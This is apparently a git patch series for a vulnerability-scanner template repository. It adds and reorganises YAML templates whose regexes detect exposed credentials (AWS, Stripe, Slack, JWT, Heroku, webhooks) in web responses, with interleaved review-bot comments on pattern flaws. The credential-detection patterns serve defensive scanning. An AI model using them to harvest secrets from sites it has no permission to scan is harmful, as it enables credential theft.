exposed-tokens/sonarqube/sonarqube-token.yaml create mode 100755 exposed-tokens/stripe/stripe-restricted-key.yaml create mode 100755 exposed-tokens/stripe/stripe-secret-key.yaml create mode 100755 exposed-tokens/zapier/zapier-webhook-token.yaml create mode 100755 exposed-tokens/zoho/zoho-webhook-token.yaml diff --git a/exposed-tokens/aws/amazon-mws-auth-token-value.yaml b/exposed-tokens/amazon/amazon-mws-auth-token.yaml similarity index 72% rename from exposed-tokens/aws/amazon-mws-auth-token-value.yaml rename to exposed-tokens/amazon/amazon-mws-auth-token.yaml index e0f70808f5..6ca9b23318 100644 --- a/exposed-tokens/aws/amazon-mws-auth-token-value.yaml +++ b/exposed-tokens/amazon/amazon-mws-auth-token.yaml @@ -1,9 +1,9 @@ -id: amazon-mws-auth-token-value +id: amazon-mws-auth-token info: + name: Amazon MWS Auth Token author: puzzlepeaches - name: "Amazon MWS Auth Token" - severity: medium + severity: info tags: token,aws requests: diff --git a/exposed-tokens/amazon/amazon-sns-topic.yaml b/exposed-tokens/amazon/amazon-sns-topic.yaml new file mode 100755 index 0000000000..a04f44bfe5 --- /dev/null +++ b/exposed-tokens/amazon/amazon-sns-topic.yaml @@ -0,0 +1,17 @@ +id: amazon-sns-topic + +info: + name: Amazon SNS Topic Disclosure + author: Ice3man + severity: info + tags: token,amazon + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+' \ No newline at end of file diff --git a/exposed-tokens/aws/aws-access-key-value.yaml b/exposed-tokens/amazon/aws-access-key-value.yaml similarity index 87% rename from exposed-tokens/aws/aws-access-key-value.yaml rename to exposed-tokens/amazon/aws-access-key-value.yaml index f1873560bd..089e61d558 100644 --- a/exposed-tokens/aws/aws-access-key-value.yaml +++ b/exposed-tokens/amazon/aws-access-key-value.yaml 
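Review bot: After moving `amazon-mws-auth-token.yaml` to `exposed-tokens/amazon/`, its `tags: token,aws` is left unchanged, whereas the sibling `aws-access-key-value.yaml` in the same patch becomes `tags: token,aws,amazon` and the new `amazon-sns-topic.yaml` uses `token,amazon`; pick one convention and apply it to all three. Renaming the `id` from `amazon-mws-auth-token-value` to `amazon-mws-auth-token` breaks any workflow or exclusion list that references the old id, which the commit message should call out if intended. The severity drop from `medium` to `info` is unexplained; I can't judge it from the hunk alone, but a sentence in the commit message would help.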
@@ -4,7 +4,7 @@ info: name: AWS Access Key ID Value author: Swissky severity: info - tags: token,aws + tags: token,aws,amazon requests: - method: GET diff --git a/exposed-tokens/amazon/s3cmd-config.yaml b/exposed-tokens/amazon/s3cmd-config.yaml new file mode 100755 index 0000000000..553330f329 --- /dev/null +++ b/exposed-tokens/amazon/s3cmd-config.yaml @@ -0,0 +1,19 @@ +id: s3cmd-config + +info: + name: S3CMD Configuration Disclosure + author: Ice3man + severity: info + tags: amazon,config + +requests: + - method: GET + path: + - "{{BaseURL}}/s3cmd.ini" + matchers: + - type: word + part: body + words: + - '[default]' + - 'access_key' + condition: and \ No newline at end of file diff --git a/exposed-tokens/artifactory/artifactory-api-password.yaml b/exposed-tokens/artifactory/artifactory-api-password.yaml new file mode 100755 index 0000000000..7edfb3fdb1 --- /dev/null +++ b/exposed-tokens/artifactory/artifactory-api-password.yaml @@ -0,0 +1,18 @@ +id: artifactory-api-password + +info: + name: Artifactory Password Disclosure + author: Ice3man + severity: info + tags: token,artifactory + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - '(?:\s|=|:|"|^)AP[\dABCDEF][a-zA-Z0-9]{8,}' \ No newline at end of file diff --git a/exposed-tokens/artifactory/artifactory-api-token.yaml b/exposed-tokens/artifactory/artifactory-api-token.yaml new file mode 100755 index 0000000000..774f6e7f36 --- /dev/null +++ b/exposed-tokens/artifactory/artifactory-api-token.yaml @@ -0,0 +1,18 @@ +id: artifactory-api-token + +info: + name: Artifactory API Token Disclosure + author: Ice3man + severity: info + tags: token,artifactory + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - '(?:\s|=|:|"|^)AKC[a-zA-Z0-9]{10,}' \ No newline at end of file 
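Review bot: `s3cmd-config.yaml` is a configuration-file disclosure check rather than a token pattern, yet it lives under `exposed-tokens/amazon/` and is tagged `amazon,config` with no `token` tag; `exposures/configs/` (where `amazon-docker-config-disclosure.yaml` sits, tagged `config,exposure,aws`) looks like the intended home. There is no status matcher, so only the two body words gate the match — fine if `[default]` plus `access_key` is specific enough, but a `- type: status` with `200` would be consistent with the other exposure templates. The file lacks a trailing newline.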
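Review bot: The regex `(?:\s|=|:|"|^)AP[\dABCDEF][a-zA-Z0-9]{8,}` in `artifactory-api-password.yaml` includes its delimiter prefix in the extracted value, so every reported match carries a leading space, `=`, `:` or `"`; wrap the token in a capture group and select it with the extractor's `group` option (`- '(?:\s|=|:|"|^)(AP[\dABCDEF][a-zA-Z0-9]{8,})'` plus `group: 1`). The pattern also admits ordinary words — ` APACHEServer` or ` APEXsomething12` satisfy `AP[\dABCDEF]` followed by eight alphanumerics — so expect noise even at `severity: info`. The same prefix-in-match issue applies to `AKC[a-zA-Z0-9]{10,}` in `artifactory-api-token.yaml` in the next hunk, and both files end without a newline.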
diff --git a/exposed-tokens/bitly/bitly-secret-key.yaml b/exposed-tokens/bitly/bitly-secret-key.yaml new file mode 100755 index 0000000000..6d9d9884c9 --- /dev/null +++ b/exposed-tokens/bitly/bitly-secret-key.yaml @@ -0,0 +1,18 @@ +id: bitly-secret-key + +info: + name: Bitly Secret Key Disclosure + author: Ice3man + severity: info + tags: token,bitly + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - 'R_[0-9a-f]{32}' \ No newline at end of file diff --git a/exposed-tokens/cloudinary/cloudinary-credentials.yaml b/exposed-tokens/cloudinary/cloudinary-credentials.yaml new file mode 100755 index 0000000000..1eaedfaccd --- /dev/null +++ b/exposed-tokens/cloudinary/cloudinary-credentials.yaml @@ -0,0 +1,18 @@ +id: cloudinary-credentials + +info: + name: Cloudinary Credentials Disclosure + author: Ice3man + severity: info + tags: token,cloudinary + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - 'cloudinary://[0-9]+:[A-Za-z0-9\-_\.]+@[A-Za-z0-9\-_\.]+' \ No newline at end of file diff --git a/exposed-tokens/discord/discord-webhook.yaml b/exposed-tokens/discord/discord-webhook.yaml new file mode 100755 index 0000000000..7961d02652 --- /dev/null +++ b/exposed-tokens/discord/discord-webhook.yaml @@ -0,0 +1,18 @@ +id: discord-webhook + +info: + name: Discord Webhook Disclosure + author: Ice3man + severity: info + tags: token,discord + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - 'https://discordapp\.com/api/webhooks/[0-9]+/[A-Za-z0-9\-]+' \ No newline at end of file diff --git a/exposed-tokens/generic/general-tokens.yaml b/exposed-tokens/generic/general-tokens.yaml index 33df4a717b..d1ef5d886c 100644 --- a/exposed-tokens/generic/general-tokens.yaml +++ b/exposed-tokens/generic/general-tokens.yaml 
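Review bot: The regex in `discord-webhook.yaml` is pinned to `discordapp\.com`, but Discord moved its primary domain to `discord.com` in 2020, and as far as I know webhook tokens contain `_` as well as `-`; `https://discord(?:app)?\.com/api/webhooks/[0-9]+/[A-Za-z0-9_\-]+` covers both. `bitly-secret-key.yaml`'s `R_[0-9a-f]{32}` has no boundary on either side, so any 32-hex run after `R_` inside a longer identifier is reported — probably acceptable at `info`, but a comment describing the expected shape would help. All three files in these hunks lack a trailing newline.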
@@ -10,14 +10,9 @@ requests: - method: GET path: - '{{BaseURL}}' + matchers-condition: and matchers: - - type: regex - part: body - regex: - - (K|k)ey(up|down|press) - negative: true - - type: dsl dsl: - regex("TOKEN[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) @@ -26,6 +21,13 @@ requests: - regex("SECRET[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) - regex("AUTHORIZATION[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) - regex("PASSWORD[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) + + - type: regex + part: body + regex: + - (K|k)ey(up|down|press) + negative: true + extractors: - type: regex part: body diff --git a/exposed-tokens/generic/jdbc-connection-string.yaml b/exposed-tokens/generic/jdbc-connection-string.yaml new file mode 100755 index 0000000000..0573b0f11f --- /dev/null +++ b/exposed-tokens/generic/jdbc-connection-string.yaml @@ -0,0 +1,18 @@ +id: jdbc-connection-string + +info: + name: JDBC Connection String Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - 'jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+' \ No newline at end of file diff --git a/exposed-tokens/generic/jwt-token.yaml b/exposed-tokens/generic/jwt-token.yaml new file mode 100644 index 0000000000..65d7a8117b --- /dev/null +++ b/exposed-tokens/generic/jwt-token.yaml @@ -0,0 +1,18 @@ +id: jwt-token + +info: + name: JWT Token Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - 'eyJ[a-zA-Z0-9]{10,}\.eyJ[a-zA-Z0-9]{10,}\.[a-zA-Z0-9_\-]{10,}' \ No newline at end of file 
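Review bot: The substantive change in general-tokens.yaml is the new `matchers-condition: and`, not the reorder, and it deserves a comment: with the default condition (`or`, as far as I recall) the `negative: true` keyup/keydown matcher on its own satisfied the template on any page that simply did not mention those JS events. Suggest `# AND is required: the negative key-event guard may only suppress a hit, never produce one` above `matchers:`. It is worth stating in the same comment that the guard now also suppresses genuine token hits on any page whose scripts mention keydown/keyup, which is an accepted trade-off for a generic template.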
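Review bot: The jwt-token regex uses different alphabets per segment: `eyJ[a-zA-Z0-9]{10,}` for header and payload but `[a-zA-Z0-9_\-]{10,}` for the signature, yet every JWT segment is base64url and may contain `-` and `_`, so tokens whose header or payload encodes to those characters are not extracted. Use the same class throughout: `eyJ[a-zA-Z0-9_\-]{10,}\.eyJ[a-zA-Z0-9_\-]{10,}\.[a-zA-Z0-9_\-]{10,}`. Note in a comment that unsigned tokens (`alg` none, empty third segment) are deliberately out of scope, since the pattern requires a non-empty signature.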
diff --git a/exposed-tokens/google/google-calendar-link.yaml b/exposed-tokens/google/google-calendar-link.yaml new file mode 100755 index 0000000000..291eccaf20 --- /dev/null +++ b/exposed-tokens/google/google-calendar-link.yaml @@ -0,0 +1,18 @@ +id: google-calendar-link + +info: + name: Google Calendar URI Disclosure + author: Ice3man + severity: info + tags: token,google + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - 'https://www\.google\.com/calendar/embed\?src=[A-Za-z0-9%@&;=\-_\./]+' \ No newline at end of file diff --git a/exposed-tokens/google/oauth-access-key.yaml b/exposed-tokens/google/oauth-access-key.yaml new file mode 100755 index 0000000000..b20ad27af6 --- /dev/null +++ b/exposed-tokens/google/oauth-access-key.yaml @@ -0,0 +1,18 @@ +id: google-oauth-access-key + +info: + name: Google OAuth Access Key Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - 'ya29\.[0-9A-Za-z\-_]+' \ No newline at end of file diff --git a/exposed-tokens/heroku/heroku-api-key.yaml b/exposed-tokens/heroku/heroku-api-key.yaml new file mode 100755 index 0000000000..93dea264d9 --- /dev/null +++ b/exposed-tokens/heroku/heroku-api-key.yaml @@ -0,0 +1,17 @@ +id: heroku-api-key + +info: + name: Heroku API Key Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - '(?i)(?:heroku_api_key|heroku_api_token|heroku_api_secret|heroku_key|heroku_token|heroku_auth|herokuAuth|heroku_auth_token)[\W|\s]{1,10([0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}' \ No newline at end of file diff --git a/exposed-tokens/mailchimp/mailchimp-api-key.yaml b/exposed-tokens/mailchimp/mailchimp-api-key.yaml index b7edc4e0a1..4c43da6d84 100644 
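Review bot: google-oauth-access-key carries `tags: token` while google-calendar-link in the same patch uses `tags: token,google`, so a `-tags google` run selects one Google template but not the other; make it `tags: token,google`. The `ya29\.[0-9A-Za-z\-_]+` pattern is also unbounded on the right, so consider terminating it with `(?:[^0-9A-Za-z\-_]|$)` to avoid swallowing adjacent text.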
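Review bot: The heroku-api-key regex is malformed: `[\W|\s]{1,10(` never closes the `{1,10` repeat, so the pattern either fails to compile or (in Go's RE2, which treats an unparsable `{` as a literal) requires the literal text `{1,10` in the body and never matches a real key. The intended form is `[\W\s]{1,10}(` followed by the UUID group; the `|` inside the character class is also a literal and should be dropped. A comment noting that the value is matched as a UUID after a heroku_* key name would make the pattern reviewable.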
--- a/exposed-tokens/mailchimp/mailchimp-api-key.yaml +++ b/exposed-tokens/mailchimp/mailchimp-api-key.yaml @@ -3,7 +3,7 @@ id: mailchimp-access-key-value info: name: Mailchimp API Value author: puzzlepeaches - severity: medium + severity: info tags: token,mailchimp requests: diff --git a/exposed-tokens/microsoft/microsoft-teams-webhook.yaml b/exposed-tokens/microsoft/microsoft-teams-webhook.yaml new file mode 100755 index 0000000000..ad8594f363 --- /dev/null +++ b/exposed-tokens/microsoft/microsoft-teams-webhook.yaml @@ -0,0 +1,17 @@ +id: microsoft-teams-webhook + +info: + name: Microsoft Teams Webhook Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'https://outlook\.office\.com/webhook/[A-Za-z0-9\-@]+/IncomingWebhook/[A-Za-z0-9\-]+/[A-Za-z0-9\-]+' \ No newline at end of file diff --git a/exposed-tokens/newrelic/newrelic-admin-api-key.yaml b/exposed-tokens/newrelic/newrelic-admin-api-key.yaml new file mode 100644 index 0000000000..d2256644a9 --- /dev/null +++ b/exposed-tokens/newrelic/newrelic-admin-api-key.yaml @@ -0,0 +1,17 @@ +id: newrelic-admin-api-key + +info: + name: Admin API Key Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - '(?i)NRAA-[a-f0-9]{27}' \ No newline at end of file diff --git a/exposed-tokens/newrelic/newrelic-insights-key.yaml b/exposed-tokens/newrelic/newrelic-insights-key.yaml new file mode 100644 index 0000000000..caa20b9b43 --- /dev/null +++ b/exposed-tokens/newrelic/newrelic-insights-key.yaml @@ -0,0 +1,17 @@ +id: newrelic-insights-key + +info: + name: Insights Keys Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - '(?i)NRI(?:I|Q)-[A-Za-z0-9\-_]{32}' \ No newline at end of file 
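Review bot: `name: Admin API Key Disclosure` omits the vendor, unlike the other templates in this patch (`Sendgrid API Key Disclosure`, `Slack Webhook Disclosure`), so the finding is ambiguous in output that lists only the name; make it `name: New Relic Admin API Key Disclosure` and `tags: token,newrelic`. The same applies to `Insights Keys Disclosure` in the newrelic-insights-key template added here.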
diff --git a/exposed-tokens/newrelic/newrelic-rest-api-key.yaml b/exposed-tokens/newrelic/newrelic-rest-api-key.yaml new file mode 100644 index 0000000000..157a9376ef --- /dev/null +++ b/exposed-tokens/newrelic/newrelic-rest-api-key.yaml @@ -0,0 +1,17 @@ +id: newrelic-rest-api-key + +info: + name: REST API Key Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - '(?i)NRRA-[a-f0-9]{42}' \ No newline at end of file diff --git a/exposed-tokens/newrelic/newrelic-synthetics-location-key.yaml b/exposed-tokens/newrelic/newrelic-synthetics-location-key.yaml new file mode 100644 index 0000000000..dd5b7f3273 --- /dev/null +++ b/exposed-tokens/newrelic/newrelic-synthetics-location-key.yaml @@ -0,0 +1,17 @@ +id: newrelic-synthetics-location-key + +info: + name: Synthetics Location Key Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - '(?i)NRSP-[a-z]{2}[0-9]{2}[a-f0-9]{31}' \ No newline at end of file diff --git a/exposed-tokens/paypal/braintree-access-token.yaml b/exposed-tokens/paypal/braintree-access-token.yaml new file mode 100755 index 0000000000..463875f314 --- /dev/null +++ b/exposed-tokens/paypal/braintree-access-token.yaml @@ -0,0 +1,17 @@ +id: braintree-access-token + +info: + name: PayPal Braintree Access Token Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}' \ No newline at end of file diff --git a/exposed-tokens/picatic/picatic-api-key.yaml b/exposed-tokens/picatic/picatic-api-key.yaml new file mode 100755 index 0000000000..09e0983219 --- /dev/null +++ b/exposed-tokens/picatic/picatic-api-key.yaml 
@@ -0,0 +1,17 @@ +id: picatic-api-key + +info: + name: Picatic API Key Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'sk_live_[0-9a-z]{32}' \ No newline at end of file diff --git a/exposed-tokens/sendgrid/sendgrid-api-key.yaml b/exposed-tokens/sendgrid/sendgrid-api-key.yaml new file mode 100644 index 0000000000..13809614c0 --- /dev/null +++ b/exposed-tokens/sendgrid/sendgrid-api-key.yaml @@ -0,0 +1,17 @@ +id: sendgrid-api-key + +info: + name: Sendgrid API Key Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'SG\.[a-zA-Z0-9-_]{22}\.[a-zA-Z0-9_-]{43}' \ No newline at end of file diff --git a/exposed-tokens/slack/slack-access-token.yaml b/exposed-tokens/slack/slack-access-token.yaml deleted file mode 100644 index a082412fdd..0000000000 --- a/exposed-tokens/slack/slack-access-token.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: slack-access-token - -# xoxp-702234529XXX-688970480XXX-109182524XXXX-87fa5b4d2e62ac5c16fc6ea93bXXXXXX -# xoxb-702234529XXX-1076883857XXX-Ou9aRuvtFZ4DuTsepevXXXXX - -info: - name: Slack access token - author: nadino - severity: medium - tags: token,slack - -requests: - - method: GET - path: - - "{{BaseURL}}" - - extractors: - - type: regex - name: person-token - part: body - regex: - - "xoxp-[0-9A-Za-z\\-]{72}" - - - type: regex - name: bot-token - part: body - regex: - - "xoxb-[0-9A-Za-z\\-]{51}" \ No newline at end of file diff --git a/exposed-tokens/generic/http-username-password.yaml b/exposed-tokens/slack/slack-bot-token.yaml similarity index 53% rename from exposed-tokens/generic/http-username-password.yaml rename to exposed-tokens/slack/slack-bot-token.yaml index bf59102302..9da23472cc 100644 --- a/exposed-tokens/generic/http-username-password.yaml +++ b/exposed-tokens/slack/slack-bot-token.yaml 
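Review bot: The picatic pattern `sk_live_[0-9a-z]{32}` shares the `sk_live_` prefix with the Stripe secret-key template added further on in this series (`sk_(?:live|test)_[0-9a-zA-Z]{24}`), so a lowercase Stripe key of 32 or more characters is reported as a Picatic key as well. Add a trailing boundary, `sk_live_[0-9a-z]{32}(?:[^0-9a-zA-Z]|$)` (Go's RE2 has no lookahead), and a comment on both templates noting the prefix overlap so the attribution is understood as best-effort.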
@@ -1,10 +1,10 @@ -id: http-username-password +id: slack-bot-token info: - name: Http usernamme password + name: Slack access token author: nadino severity: info - tags: token + tags: token,slack requests: - method: GET @@ -15,4 +15,4 @@ requests: - type: regex part: body regex: - - '(ftp|ftps|http|https)://[A-Za-z0-9-_:\.~]+(@)' + - "xoxb-[0-9A-Za-z\\-]{51}" \ No newline at end of file diff --git a/exposed-tokens/slack/slack-user-token.yaml b/exposed-tokens/slack/slack-user-token.yaml new file mode 100644 index 0000000000..ab525236a6 --- /dev/null +++ b/exposed-tokens/slack/slack-user-token.yaml @@ -0,0 +1,18 @@ +id: slack-user-token + +info: + name: Slack API-Key Disclosure + author: Ice3man + severity: info + tags: token,slack + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "xoxp-[0-9A-Za-z\\-]{72}" \ No newline at end of file diff --git a/exposed-tokens/slack/slack-webhook-token.yaml b/exposed-tokens/slack/slack-webhook-token.yaml new file mode 100755 index 0000000000..e56ad56859 --- /dev/null +++ b/exposed-tokens/slack/slack-webhook-token.yaml @@ -0,0 +1,18 @@ +id: slack-webhook-token + +info: + name: Slack Webhook Disclosure + author: Ice3man + severity: info + tags: token,slack + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "https://hooks\\.slack\\.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}" \ No newline at end of file diff --git a/exposed-tokens/sonarqube/sonarqube-token.yaml b/exposed-tokens/sonarqube/sonarqube-token.yaml new file mode 100755 index 0000000000..785b2c6072 --- /dev/null +++ b/exposed-tokens/sonarqube/sonarqube-token.yaml 
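Review bot: The renamed slack-bot-token template keeps `name: Slack access token`, which no longer distinguishes it from the user-token template; make it `name: Slack Bot token disclosure` to match the naming used for the user token. The rename also silently drops the generic `(ftp|ftps|http|https)://user:pass@` URL-credential extractor with no replacement; if that coverage is meant to go, say so in the commit message, otherwise keep http-username-password.yaml and add the bot token as a new file. The exact `{51}` width matches the example in the deleted file but will miss bot tokens whose numeric IDs are longer, so consider a bounded range.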
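Review bot: The slack-webhook pattern pins the `T` and `B` identifiers to exactly 8 characters and the final segment to 24, so any webhook whose identifiers are a different length (newer workspace IDs are, I believe, longer) is missed entirely. A bounded range such as `T[a-zA-Z0-9_]{8,12}/B[a-zA-Z0-9_]{8,12}/[a-zA-Z0-9_]{23,25}` keeps the shape while tolerating growth; add a comment recording where the widths came from so they can be re-checked.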
@@ -0,0 +1,17 @@ +id: sonarqube-token + +info: + name: SonarQube Token Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - "sonar.{0,50}(?:\"|'|`)?[0-9a-f]{40}(?:\"|'|`)?" \ No newline at end of file diff --git a/exposed-tokens/stripe/stripe-restricted-key.yaml b/exposed-tokens/stripe/stripe-restricted-key.yaml new file mode 100755 index 0000000000..1fbc33bfb6 --- /dev/null +++ b/exposed-tokens/stripe/stripe-restricted-key.yaml @@ -0,0 +1,17 @@ +id: stripe-restricted-key + +info: + name: Stripe Restricted Key Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'rk_(?:live|test)_[0-9a-zA-Z]{24}' \ No newline at end of file diff --git a/exposed-tokens/stripe/stripe-secret-key.yaml b/exposed-tokens/stripe/stripe-secret-key.yaml new file mode 100755 index 0000000000..fc382d398b --- /dev/null +++ b/exposed-tokens/stripe/stripe-secret-key.yaml @@ -0,0 +1,17 @@ +id: stripe-secret-key + +info: + name: Stripe Secret Key Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'sk_(?:live|test)_[0-9a-zA-Z]{24}' \ No newline at end of file diff --git a/exposed-tokens/zapier/zapier-webhook-token.yaml b/exposed-tokens/zapier/zapier-webhook-token.yaml new file mode 100755 index 0000000000..9eaa9ab0c8 --- /dev/null +++ b/exposed-tokens/zapier/zapier-webhook-token.yaml @@ -0,0 +1,17 @@ +id: zapier-webhook-token + +info: + name: Zapier Webhook Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'https://(?:www.)?hooks\.zapier\.com/hooks/catch/[A-Za-z0-9]+/[A-Za-z0-9]+/' \ No newline at end of file 
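Review bot: `sk_(?:live|test)_[0-9a-zA-Z]{24}` reports test-mode keys under the same id and `info` severity as live keys, and the `sk_live_` prefix is shared with the picatic-api-key template in this series, so one string can be attributed to two services. Consider separate named extractors, e.g. `name: stripe-live-key` for `sk_live_[0-9a-zA-Z]{24}` and `name: stripe-test-key` for the test form, plus a comment noting the Picatic overlap; the deleted slack template shows the `name:` field is available on extractors.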
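Review bot: In the zapier pattern `https://(?:www.)?hooks\.zapier\.com/...` the dot in `www.` is unescaped while every other dot is escaped; it still matches the literal dot, but it is inconsistent and reads like a slip, so write `(?:www\.)?`. A short comment that the captured `/hooks/catch/<id>/<key>/` URL is itself the credential would explain why this lives under exposed-tokens.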
diff --git a/exposed-tokens/zoho/zoho-webhook-token.yaml b/exposed-tokens/zoho/zoho-webhook-token.yaml new file mode 100755 index 0000000000..1567d915ab --- /dev/null +++ b/exposed-tokens/zoho/zoho-webhook-token.yaml @@ -0,0 +1,17 @@ +id: zoho-webhook-token + +info: + name: Zoho Webhook Disclosure + author: Ice3man + severity: info + tags: token + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'https://creator\.zoho\.com/api/[A-Za-z0-9/\-_\.]+\?authtoken=[A-Za-z0-9]+' \ No newline at end of file From 99307386dbb71462de6dc893686e3911d6f164c9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 21:17:52 +0530 Subject: [PATCH 24/79] Update slack-user-token.yaml --- exposed-tokens/slack/slack-user-token.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-tokens/slack/slack-user-token.yaml b/exposed-tokens/slack/slack-user-token.yaml index ab525236a6..339411fa38 100644 --- a/exposed-tokens/slack/slack-user-token.yaml +++ b/exposed-tokens/slack/slack-user-token.yaml @@ -1,7 +1,7 @@ id: slack-user-token info: - name: Slack API-Key Disclosure + name: Slack User token disclosure author: Ice3man severity: info tags: token,slack From e954b9d5cf50380e9e3723458bce4bcfeb7a612f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 21:21:43 +0530 Subject: [PATCH 25/79] Update jwt-token.yaml --- exposed-tokens/generic/jwt-token.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-tokens/generic/jwt-token.yaml b/exposed-tokens/generic/jwt-token.yaml index 65d7a8117b..bdd287142a 100644 --- a/exposed-tokens/generic/jwt-token.yaml +++ b/exposed-tokens/generic/jwt-token.yaml @@ -10,7 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}" - + extractors: - type: regex part: body From ebcc0458fee7effbdbd1958594bf83e30168c548 Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 21:23:35 +0530 Subject: [PATCH 26/79] Update s3cmd-config.yaml --- exposed-tokens/amazon/s3cmd-config.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-tokens/amazon/s3cmd-config.yaml b/exposed-tokens/amazon/s3cmd-config.yaml index 553330f329..1d800ce9b1 100755 --- a/exposed-tokens/amazon/s3cmd-config.yaml +++ b/exposed-tokens/amazon/s3cmd-config.yaml @@ -4,12 +4,13 @@ info: name: S3CMD Configuration Disclosure author: Ice3man severity: info - tags: amazon,config + tags: amazon,config requests: - method: GET path: - "{{BaseURL}}/s3cmd.ini" + matchers: - type: word part: body From d246fb4ad8c506ac5d69d7be7cbd89200e658a07 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 21:39:19 +0530 Subject: [PATCH 27/79] moving files around --- .../amazon => exposures/configs}/s3cmd-config.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) rename {exposed-tokens/amazon => exposures/configs}/s3cmd-config.yaml (67%) diff --git a/exposed-tokens/amazon/s3cmd-config.yaml b/exposures/configs/s3cmd-config.yaml similarity index 67% rename from exposed-tokens/amazon/s3cmd-config.yaml rename to exposures/configs/s3cmd-config.yaml index 1d800ce9b1..b4af8e090f 100755 --- a/exposed-tokens/amazon/s3cmd-config.yaml +++ b/exposures/configs/s3cmd-config.yaml @@ -4,17 +4,22 @@ info: name: S3CMD Configuration Disclosure author: Ice3man severity: info - tags: amazon,config + tags: amazon,config,exposure requests: - method: GET path: - "{{BaseURL}}/s3cmd.ini" + matchers-condition: and matchers: - type: word part: body words: - '[default]' - 'access_key' - condition: and \ No newline at end of file + condition: and + + - type: status + status: + - 200 \ No newline at end of file From d271fd4d8e9446fa352eaf6ab3d1351603c36b64 Mon Sep 17 00:00:00 2001 
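Review bot: The s3cmd matcher still confirms only `[default]` and `access_key`, so a sanitized or templated s3cmd.ini with the secret removed is reported exactly like one leaking credentials. Since the s3cmd config format keeps the secret in `secret_key`, adding `- 'secret_key'` to the `and` list (or an extractor for that line) turns the hit into evidence of actual credential disclosure; the added 200 status gate is a good change.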
